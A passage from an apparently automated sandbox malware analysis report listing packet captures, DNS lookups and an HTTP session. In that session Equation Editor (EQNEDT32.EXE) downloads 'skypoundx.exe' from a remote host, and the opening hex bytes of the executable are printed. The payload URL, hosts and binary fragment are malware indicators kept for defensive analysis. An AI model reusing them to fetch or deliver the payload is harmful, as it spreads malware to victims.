                                                                                                                                                            Nov 26, 2020 08:44:07.667274952 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.667284012 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.667342901 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.667360067 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.840684891 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840725899 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840748072 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840759039 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.840769053 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840780973 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.840783119 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.840786934 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840797901 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.840811968 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840820074 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.840835094 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840847969 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.840863943 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840866089 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.840882063 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840899944 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.840903044 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840914965 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.840923071 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840930939 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.840945005 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840955019 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.840965033 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840986967 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.840989113 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841006041 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841010094 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841025114 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841026068 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841046095 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841047049 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841059923 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841068983 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841077089 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841092110 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841114998 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841115952 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841129065 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841136932 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841147900 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841161013 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841167927 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841182947 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841197968 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841207027 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841214895 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841226101 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841247082 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841248989 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841260910 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841272116 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841279030 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841295004 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841309071 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841311932 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841331959 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841339111 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841347933 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841356039 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841363907 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841371059 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841379881 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841397047 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841412067 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841413021 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841428041 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841428995 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841445923 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841454029 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841463089 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841479063 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841481924 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841495991 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841502905 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841511965 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841522932 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841526985 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841542006 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841543913 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841557026 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.841566086 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841578960 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.841595888 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:08.200517893 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:45:59.612518072 CET4916880192.168.2.2250.117.11.156
                                                                                                                                                            Nov 26, 2020 08:45:59.790090084 CET804916850.117.11.156192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:45:59.790298939 CET4916880192.168.2.2250.117.11.156
                                                                                                                                                            Nov 26, 2020 08:45:59.790648937 CET4916880192.168.2.2250.117.11.156
                                                                                                                                                            Nov 26, 2020 08:45:59.969166994 CET804916850.117.11.156192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:45:59.969196081 CET804916850.117.11.156192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:45:59.969208002 CET804916850.117.11.156192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:45:59.969219923 CET804916850.117.11.156192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:45:59.969228983 CET804916850.117.11.156192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:45:59.969433069 CET4916880192.168.2.2250.117.11.156
                                                                                                                                                            Nov 26, 2020 08:45:59.969481945 CET4916880192.168.2.2250.117.11.156
                                                                                                                                                            Nov 26, 2020 08:46:05.026905060 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.157525063 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.157594919 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.157809019 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.288069963 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.290102005 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.290124893 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.290139914 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.290158987 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.290175915 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.290190935 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.290205956 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.290221930 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.290235996 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.290242910 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.290251017 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.290265083 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.290287971 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.420984030 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.421025991 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.421067953 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.421104908 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.421150923 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.421154022 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.421173096 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.421192884 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.421230078 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.421257973 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.421267033 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.421303988 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.421340942 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.421353102 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.421405077 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.423012972 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.423053980 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.423089981 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.423126936 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.423127890 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.423162937 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.423188925 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.423208952 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.423249006 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.423274040 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.423285007 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.423322916 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.423351049 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.423360109 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.423420906 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.551770926 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.551800013 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.551812887 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.551826000 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.551837921 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.551855087 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.551867008 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.551882982 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.551899910 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.551919937 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.551937103 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.551951885 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.551969051 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.551985025 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.552000999 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.552017927 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.552032948 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.552051067 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.552067995 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.552083015 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.552243948 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.552283049 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.552351952 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.553672075 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.553694963 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.553708076 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.553725958 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.553741932 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.553759098 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.553783894 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.553798914 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.553802013 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.553803921 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.553812981 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.553828955 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.553848982 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.553858042 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.553863049 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.553869963 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.553899050 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.553915977 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.553920031 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.553927898 CET8049169198.49.23.141192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:05.553940058 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.553956985 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.553963900 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:05.553972006 CET4916980192.168.2.22198.49.23.141
                                                                                                                                                            Nov 26, 2020 08:46:10.612530947 CET4917080192.168.2.2234.102.136.180
                                                                                                                                                            Nov 26, 2020 08:46:10.629163980 CET804917034.102.136.180192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:10.629637003 CET4917080192.168.2.2234.102.136.180
                                                                                                                                                            Nov 26, 2020 08:46:10.629771948 CET4917080192.168.2.2234.102.136.180
                                                                                                                                                            Nov 26, 2020 08:46:10.646271944 CET804917034.102.136.180192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:10.744771957 CET804917034.102.136.180192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:10.744816065 CET804917034.102.136.180192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:10.744946957 CET4917080192.168.2.2234.102.136.180
                                                                                                                                                            Nov 26, 2020 08:46:10.744996071 CET4917080192.168.2.2234.102.136.180
                                                                                                                                                            Nov 26, 2020 08:46:10.761529922 CET804917034.102.136.180192.168.2.22

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Nov 26, 2020 08:44:06.484982967 CET5219753192.168.2.228.8.8.8
                                                                                                                                                            Nov 26, 2020 08:44:06.529192924 CET53521978.8.8.8192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:45:54.203960896 CET5309953192.168.2.228.8.8.8
                                                                                                                                                            Nov 26, 2020 08:45:54.245131016 CET53530998.8.8.8192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:45:59.259130001 CET5283853192.168.2.228.8.8.8
                                                                                                                                                            Nov 26, 2020 08:45:59.604048014 CET53528388.8.8.8192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:04.984123945 CET6120053192.168.2.228.8.8.8
                                                                                                                                                            Nov 26, 2020 08:46:05.025748014 CET53612008.8.8.8192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:10.570633888 CET4954853192.168.2.228.8.8.8
                                                                                                                                                            Nov 26, 2020 08:46:10.610701084 CET53495488.8.8.8192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:29.466934919 CET5562753192.168.2.228.8.8.8
                                                                                                                                                            Nov 26, 2020 08:46:29.508364916 CET53556278.8.8.8192.168.2.22

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                            Nov 26, 2020 08:44:06.484982967 CET192.168.2.228.8.8.80x26d4Standard query (0)sea-shared-5.masterns.comA (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:45:54.203960896 CET192.168.2.228.8.8.80xccffStandard query (0)www.musmarservices.comA (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:45:59.259130001 CET192.168.2.228.8.8.80x2e78Standard query (0)www.opel-occasions-ales.comA (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:04.984123945 CET192.168.2.228.8.8.80x2f03Standard query (0)www.runwithit.mediaA (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:10.570633888 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.mycapecrusade.comA (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:29.466934919 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.akasyaofistasima.comA (IP address)IN (0x0001)

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                            Nov 26, 2020 08:44:06.529192924 CET8.8.8.8192.168.2.220x26d4No error (0)sea-shared-5.masterns.com104.168.198.45A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:45:54.245131016 CET8.8.8.8192.168.2.220xccffName error (3)www.musmarservices.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:45:59.604048014 CET8.8.8.8192.168.2.220x2e78No error (0)www.opel-occasions-ales.com50.117.11.156A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:05.025748014 CET8.8.8.8192.168.2.220x2f03No error (0)www.runwithit.mediaext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:05.025748014 CET8.8.8.8192.168.2.220x2f03No error (0)ext-sq.squarespace.com198.49.23.141A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:05.025748014 CET8.8.8.8192.168.2.220x2f03No error (0)ext-sq.squarespace.com198.185.159.141A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:05.025748014 CET8.8.8.8192.168.2.220x2f03No error (0)ext-sq.squarespace.com198.49.23.141A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:05.025748014 CET8.8.8.8192.168.2.220x2f03No error (0)ext-sq.squarespace.com198.185.159.141A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:10.610701084 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.mycapecrusade.commycapecrusade.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:10.610701084 CET8.8.8.8192.168.2.220x3c4eNo error (0)mycapecrusade.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:29.508364916 CET8.8.8.8192.168.2.220x6ec7No error (0)www.akasyaofistasima.comakasyaofistasima.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:29.508364916 CET8.8.8.8192.168.2.220x6ec7No error (0)akasyaofistasima.com89.252.180.207A (IP address)IN (0x0001)

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • sea-shared-5.masterns.com
                                                                                                                                                            • www.opel-occasions-ales.com
                                                                                                                                                            • www.runwithit.media
                                                                                                                                                            • www.mycapecrusade.com

                                                                                                                                                            HTTP Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.2249167104.168.198.4580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 26, 2020 08:44:06.720232010 CET0OUTGET /~vhlcnlog/ugopoundx/skypoundx.exe HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                            Host: sea-shared-5.masterns.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Nov 26, 2020 08:44:06.900933027 CET2INHTTP/1.1 200 OK
                                                                                                                                                            Date: Thu, 26 Nov 2020 07:44:06 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                            Connection: Upgrade, Keep-Alive
                                                                                                                                                            Last-Modified: Thu, 26 Nov 2020 01:10:37 GMT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Content-Length: 278528
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Keep-Alive: timeout=5, max=10000
                                                                                                                                                            Content-Type: application/x-msdownload
                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c ff be 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 f2 03 00 00 4c 00 00 00 00 00 00 be 10 04 00 00 20 00 00 00 20 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 04 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 10 04 00 57 00 00 00 00 20 04 00 38 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 f0 03 00 00 20 00 00 00 f2 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 38 49 00 00 00 20 04 00 00 4a 00 00 00 f4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 04 00 00 02 00 00 00 3e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 10 04 00 00 00 00 00 48 00 00 00 02 00 05 00 6c ed 03 00 f8 22 00 00 03 00 00 00 43 00 00 06 e8 30 00 00 84 bc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 17 1e 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 1e 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 1d 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 19 1b 